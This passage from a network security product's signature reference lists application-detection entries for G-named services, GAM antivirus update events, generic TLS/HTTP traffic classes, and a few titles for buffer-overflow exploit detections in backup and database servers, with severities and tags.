Last changed: sgpkg-ips-1764-5242
Description: This service allows users to back up all contacts, messages, call log, photos, music and videos stored on mobile devices and computers to a secure cloud location.
Back to top

G-Suite-by-Google

About this situation: Application G-Suite-by-Google detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: G Suite by Google provides corporate e-mail, video conferencing, cloud storage and file sharing.
Back to top

G2Crowd

About this situation: Application G2Crowd detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: G2Crowd is a platform for users to share business software reviews.
Back to top

Gadu-Gadu

About this situation: Gadu-Gadu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-630-5211
Description: Gadu-Gadu (GG) is a collaboration application mainly adopted by Polish-spoken users. The application uses a proprietary communication protocol which borrows HTTP syntax heavily.
Back to top

Gafachi

About this situation: Application Gafachi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gafachi is an facilities-based, Voice over IP carrier that has been dedicated to quality, competitive pricing, and expert support. Gafachi continues to expand its network and services to provide cutting-edge VoIP solutions to Service Providers, Call Centers
Back to top

Gage-Control

About this situation: Application Gage-Control detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gage Control is the solution for equipment, tooling, and machine maintenance management.
Back to top

Gaia-Online

About this situation: Gaia Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Gainsight

About this situation: Application Gainsight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gainsight is a customer-driven enterprise, the Customer Success Management solution, to manage retention, reduce unexpected churn and identify upsell opportunities by leveraging 'big data' analytics across sales data, usage logs, support ticket, surveys and other sources of customer intelligence.
Back to top

Gallup.Com

About this situation: Application Gallup.Com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gallup.Com provides data-driven news based on U.S. and world polls, daily tracking and public opinion research.
Back to top

Gamasutra

About this situation: Gamasutra usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: Gamasutra usage detected. Gamasutra is a website about video games industry related news.
Back to top

Gambling

About this situation: Sites that provide information about or promote gambling or support online gambling, involving a risk of losing money.
Context: URL Application Context
Severity: 1
Tags: Gambling, Productivity Loss, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote gambling or support online gambling, involving a risk of losing money.
Back to top

Game-Design

About this situation: Game Design usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gamebattles

About this situation: GameBattles usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

GameBuilder

About this situation: Application GameBuilder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GameBuilder Studio is a 2D game creation environment and marketplace which enables aspiring game creators like STEM students as well as adults with no experience to start making games.
Back to top

Gamedesire

About this situation: GameDesire usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gamefaqs

About this situation: GameFAQs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gameforge

About this situation: Gameforge usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-916-5242
Description: Gameforge is German provider of online games, founded in 2003.
Back to top

Gamehouse

About this situation: GameHouse usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gameknot-Chess

About this situation: GameKnot Chess usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gameloft

About this situation: Gameloft usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-788-5211
Description: Gameloft is a producer of various mobile games.
Back to top

Gameloft-Asphalt7

About this situation: Gameloft Asphalt7 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-788-5211
Description: Asphalt7 is a mobile game.
Back to top

Games

About this situation: Sites that enable a user to play or download a game.
Context: URL Application Context
Severity: 1
Tags: Games, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable a user to play or download a game.
Back to top

Games-2-Download

About this situation: Games 2 Download usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Games-Radar-Us

About this situation: Games Radar US usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gamesfreak

About this situation: GamesFreak usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gamespot

About this situation: GameSpot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Gamespy

About this situation: GameSpy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A network of game websites and online video game-related services and software; source Wikipedia
Back to top

Gamestats

About this situation: GameStats usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that allows users to play games or obtain information.
Back to top

Gamezone

About this situation: GameZone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

GAM_Bad-Archive

About this situation: Bad GAM archive.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: A problem occurred while trying to open the archive during GAM update.
Back to top

GAM_Bad-Certificate

About this situation: Bad GAM certificate.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: The https certificate provided by the GAM update server is invalid.
Back to top

GAM_Bad-Xml-Response

About this situation: GAM received wrong reply from TAU server
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM recevied reply from the McAfee TAU server, which is either malformed or wrongly formatted.
Back to top

GAM_Db-Download-Ok

About this situation: Successful GAM DB download.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: The GAM database has been downloaded successfully.
Back to top

GAM_Deinitialize-Error

About this situation: GAM deinitialization error.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM library deinitialization error.
Back to top

GAM_Deinitialize-Ok

About this situation: GAM deinitialized correctly.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM library deinitialized correctly.
Back to top

GAM_Download-Error

About this situation: GAM download error.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM could not download a file during the update procedure.
Back to top

GAM_Download-Started

About this situation: GAM download started.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: GAM started downloading new database version.
Back to top

GAM_Initialize-Error

About this situation: GAM initialization error.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM library initialization error.
Back to top

GAM_Initialize-Ok

About this situation: GAM initialized correctly.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM library initialized correctly.
Back to top

GAM_No-Space

About this situation: No space left on device.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: There is not enough space on the device to perform the desired action while updating GAM.
Back to top

GAM_Scan-Failed

About this situation: GAM scan failed.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM scan failed.
Back to top

GAM_Server-Connection-Error

About this situation: GAM server connection error.
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM could not connect to the update server(s) in order to download update files.
Back to top

GAM_Server-Response-Error

About this situation: GAM did not receive reply from TAU server
Context: GAM without parameters
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-631-5211
Description: GAM could not connect to the McAfee TAU server in order to retrieve the list of update servers.
Back to top

GandA-Manager

About this situation: Application GandA-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GandA Manager - dealerships portal to achieve maximum performance through marketing, training, consulting and motivation
Back to top

Gandi.net

About this situation: Application Gandi.net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gandi is a domain name registrar and innovative cloud hosting company.GANDI.net was one of the first domain name registrars approved by ICANN for .COM, .NET,.ORG, .BIZ, .INFO, .NAME, .BE, .FR, .EU domains in France.
Back to top

Ganttic

About this situation: Application Ganttic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ganttic is a web-based proprietary project management software for organizations focusing on resource scheduling and project planning.It is used for manufacturing, engineering, construction and project-based services such as design agencies and architects.
Back to top

Gapertise

About this situation: Application Gapertise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gapertise provides APP testing services to prevent the generation of problems.
Back to top

Garage

About this situation: Application Garage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Digital Garage provide digital contexts combining our core competencies in IT
Back to top

Garena

About this situation: Garena usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application allows users to play and host online games, and provides instant messaging and live coverage of video game tournaments. Source: Wikipedia
Back to top

Garmin

About this situation: Garmin usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-788-5211
Description: Garmin is a supplier of various sports, outdoor, marine, aviation and consumer devices. This application detects usage of services provided by Garmin.
Back to top

Garmin Connect Mobile

About this situation: Endpoint Context Agent based Garmin Connect Mobile detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-994-5242
Last changed: sgpkg-ips-994-5242
Description: Garmin Connect Mobile endpoint application detected. Garmin Connect is Garmin's fitness and training platform.
Back to top

Garmin Express

About this situation: Endpoint Context Agent based Garmin Express detection
Context: EI Correlation
Severity: 1
Tags: Mobile Software, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Garmin Express endpoint application has been detected. Garmin Express mobile device syncronization and management software developed by Garmin International, Inc.
Back to top

Garmin-Connect

About this situation: Garmin Connect usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-788-5211
Description: Garmin Connect usage has been detected. Garmin Connect is a sports tracking service that is used with Garmin's health and fitness devices.
Back to top

Gartner

About this situation: Application Gartner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gartner is an information technology research and advisory company.
Back to top

GatherContent

About this situation: Application GatherContent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GatherContent is a content collaboration platform helping digital teams painlessly plan, produce and deliver content.
Back to top

Gatherplace

About this situation: GatherPlace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to hold meetings over the Internet and by telephone. A d easy to use voice and web conferencing service for online training, webinars, meetings, distance education, remote support, desktop.
Back to top

Gay or Lesbian or Bisexual Interest

About this situation: Sites that provide information about or cater to LGBT interests, but excluding those that are sexually or issue oriented.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or cater to LGBT interests, but excluding those that are sexually or issue oriented.
Back to top

GE-CreditLine-Online-Service-Centre

About this situation: Application GE-CreditLine-Online-Service-Centre detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GE Capital is the financial services unit of the American conglomerate General Electric. Online banking GE Capital provides commercial lending and leasing, as well as a range of financial services for health care, media, communications, entertainment, consumers, real estate, and aviation.
Back to top

Ge.tt

About this situation: Application Ge.tt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ge.tt is an instant, real-time file publishing and sharing service. With Ge.tt there is no need for special software or plug-ins. It is a simple file sharing and publishing tool for all types of materials including documents, video, music and photos.
Back to top

Geckoboard

About this situation: Application Geckoboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Geckoboard is a data communication tool that connects to all your data sources and displays your most important metrics on a beautifully designed and intuitive dashboard.
Back to top

Geelus

About this situation: Application Geelus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Geelus is a cloud-based POS and store management software for your dry cleaning, laundry, sewing, tailoring, and alterations business. It can be used on any Internet connected device ranging from PCs and Macs to iPhones and smart TVs.
Back to top

Geenio

About this situation: Application Geenio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Geenio is a modern cloud LMS for managing the learning process, creating courses and analysing the final results.
Back to top

Geezeo

About this situation: Application Geezeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Geezeo provides and develops online tools and solutions for banks, credit unions, and other financial service providers.
Back to top

Geico-Online-Service-Center

About this situation: Application Geico-Online-Service-Center detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Government Employees Insurance Company is an auto insurance company. GEICO writes private passenger automobile insurance in all U.S. states and the District of Columbia. GEICO sells its policies through local agents, called GEICO Field Representatives, and over the phone directly to the consumer, and through their website.
Back to top

Gem-Accounts

About this situation: Application Gem-Accounts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gem Accounts - is financial software, scalable Cloud Accounting System.
Back to top

Gemfury

About this situation: Application Gemfury detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gemfury is a cloud hosting for your private and custom packages. Once uploaded, you can install packages into your app on any host. It's simple, reliable, and hassle-free.
Back to top

Geminare

About this situation: Application Geminare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Geminare enables companies to transition existing licensed-based software into Cloud-based Recovery as a Service offerings through its patented CORE Platform.
Back to top

Gemini

About this situation: Gemini usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Description: Gemini is a chatbot created by Google. It was previously called Bard. This application is meant for blocking.
Back to top

Genbook

About this situation: Application Genbook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genbook - online appointment scheduling software for any small business with all the features you need.
Back to top

General Email

About this situation: Sites that provide email services open to general use.
Context: URL Application Context
Severity: 1
Tags: Internet Communication, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide email services open to general use.
Back to top

Generate a certificate signed by new VPN Certificate Authority and refresh the policy

About this situation: Generate a certificate signed by new VPN Certificate Authority and refresh the policy
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN Certificate Authority renewal: a certificate signed by old VPN Certificate Authority is still in use. Generate a certificate signed by the new VPN Certificate Authority and refresh the policy.
Back to top

Generic Protocol Application Stop Condition

About this situation: Generic Protocol Application Stop Condition
Context: Local Correlation
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Description: Generic Protocol Application Stop Condition for use with Protocol Applications.
Back to top

Generic Web Application Stop Condition

About this situation: Generic Web Application Stop Condition
Context: Local Correlation
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Description: Generic Web Application Stop Condition for use with Web Applications.
Back to top

Generic-TLS

About this situation: Generic TLS Application traffic
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted TLS connection, but there was no further identification based on the accessed host information. Based on the TLS handshake, the tunneled connection does not contain HTTP inside. Such connections are usually initiated by a client application other than a web browser.
Back to top

Generic-TLS-1.0

About this situation: Generic TLS Application traffic over TLSv1.0
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted TLS connection, but there was no further identification based on the accessed host information. Based on the TLS handshake, the tunneled connection does not contain HTTP inside. Such connections are usually initiated by a client application other than a web browser. This application overrides the Network Application Generic-TLS if the traffic uses TLSv1.0.
Back to top

Generic-TLS-1.1

About this situation: Generic TLS Application traffic over TLSv1.1
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted TLS connection, but there was no further identification based on the accessed host information. Based on the TLS handshake, the tunneled connection does not contain HTTP inside. Such connections are usually initiated by a client application other than a web browser. This application overrides the Network Application Generic-TLS if the traffic uses TLSv1.1.
Back to top

Generic-TLS-1.2

About this situation: Generic TLS Application traffic over TLSv1.2
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted TLS connection, but there was no further identification based on the accessed host information. Based on the TLS handshake, the tunneled connection does not contain HTTP inside. Such connections are usually initiated by a client application other than a web browser. This application overrides the Network Application Generic-TLS if the traffic uses TLSv1.2.
Back to top

Generic-TLS-1.3

About this situation: Generic TLS Application traffic over TLSv1.3
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted TLS connection, but there was no further identification based on the accessed host information. Based on the TLS handshake, the tunneled connection does not contain HTTP inside. Such connections are usually initiated by a client application other than a web browser. This application overrides the Network Application Generic-TLS if the traffic uses TLSv1.3.
Back to top

Generic-Web-HTTP

About this situation: Generic Web Application traffic over HTTP
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1192-5242
Description: This application is matched when the connection is identified as a HTTP connection, but there was no further identification.
Back to top

Generic-Web-TLS

About this situation: Generic Web Application traffic over TLS
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted HTTPS connection, but there was no further identification based on the accessed host information.
Back to top

Generic-Web-TLS-1.0

About this situation: Generic Web Application traffic over TLSv1.0
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted HTTPS connection, but there was no further identification based on the accessed host information. This application overrides the Network Application Generic-Web-TLS if the traffic uses TLSv1.0.
Back to top

Generic-Web-TLS-1.1

About this situation: Generic Web Application traffic over TLSv1.1
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted HTTPS connection, but there was no further identification based on the accessed host information. This application overrides the Network Application Generic-Web-TLS if the traffic uses TLSv1.1.
Back to top

Generic-Web-TLS-1.2

About this situation: Generic Web Application traffic over TLSv1.2
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted HTTPS connection, but there was no further identification based on the accessed host information. This application overrides the Network Application Generic-Web-TLS if the traffic uses TLSv1.2.
Back to top

Generic-Web-TLS-1.3

About this situation: Generic Web Application traffic over TLSv1.3
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1727-5242
Description: This application is matched when the connection is identified as a trusted HTTPS connection, but there was no further identification based on the accessed host information. This application overrides the Network Application Generic-Web-TLS if the traffic uses TLSv1.3.
Back to top

Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-1

About this situation: Attempt to exploit a buffer overflow in Arkeia Network Backup Server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Arkeia Network Backup, CVE2005, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-164-2032
Vulnerability: Knox-Arkeia-Network-Backup-Server-Type77-Stack-BOF
Description:
Back to top

Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-2

About this situation: Attempt to exploit a buffer overflow in Arkeia Network Backup Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Arkeia Network Backup, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Knox-Arkeia-Network-Backup-Server-Type77-Stack-BOF
Description:
Back to top

Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-3

About this situation: Attempt to exploit a buffer overflow in Arkeia Network Backup Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: OS X, Any Hardware, Arkeia Network Backup, CVE2005, OS X not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-164-2032
Vulnerability: Knox-Arkeia-Network-Backup-Server-Type77-Stack-BOF
Description:
Back to top

Generic_BakBone-NetVault-Heap-BOF

About this situation: Attempt to exploit a heap buffer overflow in the BakBone NetVault
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BakBone NetVault, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: BakBone-NetVault-Heap-BOF
Description:
Back to top

Generic_BakBone-NetVault-Heap-BOF-2

About this situation: Attempt to exploit a heap buffer overflow in the BakBone NetVault
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, BakBone NetVault, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-164-2032
Last changed: sgpkg-ips-164-2032
Vulnerability: BakBone-NetVault-Heap-BOF-2
Description:
Back to top

Generic_Borland-Interbase-Database-Service-Malformed-Request-BOF-2

About this situation: Buffer overflow exploit against Borland InterBase Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Borland Interbase, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-507-5211
Vulnerability: Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow
Description:
Back to top

Generic_Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow

About this situation: Buffer overflow exploit against Borland InterBase Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Borland Interbase, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-118-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow
Description:
Back to top

Generic_Borland-Interbase-Integer-Overflow

About this situation: Integer overflow exploit against Borland InterBase Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Borland Interbase, CVE2008, Windows not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-165-2032
Vulnerability: Borland-Interbase-Integer-Overflow-Vulnerability
Description:
Back to top

Generic_BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-BOF

About this situation: Attempt to exploit a buffer overflow in ARCServe/Enterprise Backup
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2005, Any Operating System not specific, Computer Associates BrightStor not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-45-1210
